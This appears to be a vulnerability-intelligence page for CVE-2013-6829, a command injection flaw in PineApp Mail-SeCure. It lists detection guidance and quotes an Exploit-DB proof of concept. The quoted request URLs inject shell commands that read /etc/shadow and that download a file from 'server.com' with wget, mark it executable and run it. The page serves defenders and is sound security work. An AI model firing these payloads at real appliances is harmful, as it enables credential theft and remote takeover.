CVE-2013-6829
published 2013-11-20CVE-2013-6829: admin/confnetworking.html in PineApp Mail-SeCure allows remote attackers to execute arbitrary commands via shell metacharacters in the pinghost parameter…
PriorityP276high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
78.34%
99.5th percentile
admin/confnetworking.html in PineApp Mail-SeCure allows remote attackers to execute arbitrary commands via shell metacharacters in the pinghost parameter during a ping operation.
Detection & IOCsextracted from sources · hover to see the quote
urlhttps://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;%20cat%20/etc/shadow↗
- →Detect unauthenticated HTTP GET requests to /admin/confnetworking.html containing shell metacharacters (semicolons) in the nsserver or pinghost parameters, indicative of command injection attempts. ↗
- →Alert on requests to /admin/confnetworking.html on port 7443 where query parameters contain URL-encoded semicolons (%3B or literal ;) followed by shell commands such as wget, cat, chmod, or echo. ↗
- →Monitor for creation or modification of /tmp/rc.firewall, which is abused for privilege escalation to root via a weak sudoers configuration. ↗
- →Detect SSH connections on non-standard port 7022 to the appliance, which may indicate post-exploitation root access following the SSH key injection technique described in the exploit. ↗
- →Flag HTTP requests targeting test_li_connection.php on PineApp Mail-SeCure, as this endpoint is exploited via insecure use of the system() PHP function for arbitrary command execution. ↗
- ·The exploit proof-of-concept uses a hardcoded private IP (192.168.24.24); real-world attacks will use the actual appliance IP. Detection rules should not rely on this specific IP. ↗
- ·The vulnerability in confnetworking.html requires no authentication, meaning network-level access controls (firewall rules restricting port 7443) are the primary mitigation if patching is not possible. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
PineApp MailSecure - Remote Command Execution
exploitdb·2013-11-20
CVE-2013-6831 PineApp MailSecure - Remote Command Execution
PineApp MailSecure - Remote Command Execution
---
It is possible execute any command bash as qmailq unprivilege user, sending
only the following https request, without authentication.
https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;%20cat%20/etc/shadow
To upload any file (script, binary, etc...) it is possible with wget
command.
https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;wget%20http://server.com/somefile%20-O%20/tmp/somefile
Download and execute it is possible with this request:
https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;wget%20http://server.com/somefile%20-O%20/tmp/somefile;chmod%20+x%20somefile;/t
Metasploit
PineApp Mail-SeCure test_li_connection.php Arbitrary Command Execution
metasploit
PineApp Mail-SeCure test_li_connection.php Arbitrary Command Execution
PineApp Mail-SeCure test_li_connection.php Arbitrary Command Execution
This module exploits a command injection vulnerability on PineApp Mail-SeCure 3.70. The vulnerability exists on the test_li_connection.php component, due to the insecure usage of the system() php function. This module has been tested successfully on PineApp Mail-SeCure 3.70.
No writeups or analysis indexed.
2013-11-20
Published